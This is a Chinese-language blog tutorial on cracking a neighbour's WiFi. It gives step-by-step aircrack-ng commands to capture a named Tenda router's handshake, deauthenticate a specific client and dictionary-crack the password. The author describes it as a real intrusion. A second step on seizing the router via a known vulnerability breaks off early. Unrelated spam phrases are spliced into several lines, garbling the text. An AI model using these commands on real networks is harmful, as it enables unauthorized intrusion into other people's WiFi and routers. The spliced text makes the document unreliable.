获取WiFi密码
获取WiFi密码
1.获取WiFi密码
⾸先我们要获取WiFi密码,需要⽤到⼀张⽆线⽹卡(本⼈⽤RT3070)、Aircrack-ng⼯具、密码字典。
(1). sudo airmon-ng 查看⾃⼰的⽆线⽹卡接⼝名字,我的叫wlx983f9f182782先生的英文缩写
(2). sudo airmon-ng start wlx983f9f182782 开始监控⾃⼰的⽆线⽹卡,执⾏完这条命令后它会给你⼀个监控接⼝(这⾥是wlan0mon)
什么的水花>投资软环境(3). sudo airodump-ng wlan0mon 截取隔壁家的wifi信号,今天我们要⼊侵的叫Tenda_243F00的路由器,它的bssid是
C8:3A:35:24:3F:00,channel在10号
(4). sudo airodump-ng --bssid C8:3A:35:24:3F:00 -c 10 -w tenda wlan0mon 这条命令的意思是获取这个指定路由的握⼿码(⾥⾯含加密的WiFi密码),获取的数据将输出到名为tenda的⽂件⾥(-w tenda,名字可以随便改),现在可以下⼀步,进⾏下⼀步时这个窗⼝请暂时不要关闭
洛奇英雄传堕落天使
(5). sudo aireplay-ng -0 0 -a C8:3A:35:24:3F:00 -c 60:21:01:3B:03:71 wlan0mon 这条命令是伪装成路由器发送请求给该路由器的⽤户(60:21:01:3B:03:71这就是⽤户),从⽽获取握⼿码(-0 后⾯的参数的指定次数,0为⽆限次),直到(4)的窗⼝右上⾓出现了handshake:
C8:3A:35:24:3F:00(代表你已经获取了加密过的密码,下⼀步就是解密了),就能把所有窗⼝关闭
这个就是含有加密密码的⽂件
今年中考时间>中国姓氏排名(6). sudo aircrack-ng - tenda-01.cap 开始解密,请选⽤适合⾃⼰的⼀部字典,在这⾥我就选⽤了这部字典,代表⽣⽇的意思,很多⼈的WiFi都喜欢⽤⾃⼰⽣⽇作为密码。不够两秒钟的时间,密码就出现在我眼前了。由于是真实⼊侵的原因,我要把密码屏蔽掉。
你现在可以使⽤这密码成功登⼊WiFi了!
2. 现在是第⼆步,获取控制权,能不能获取到取决于你能不能发现这个路由的漏洞,本次例⼦是⽤腾达路由,我恰好在⽹上看到了关于他的漏洞的⽂章,⼊侵变得唾⼿可得了。
(1). ⼤部分的路由管理⽹⾯都在⽹段的最前⾯,⽐如192.168.0.1,192.168.1.1。这⾥我就不多说了,你可以⽤ifconfig命令查看下路由的⽹段。我这个例⼦是192.168.0.1

版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系QQ:729038198,我们将在24小时内删除。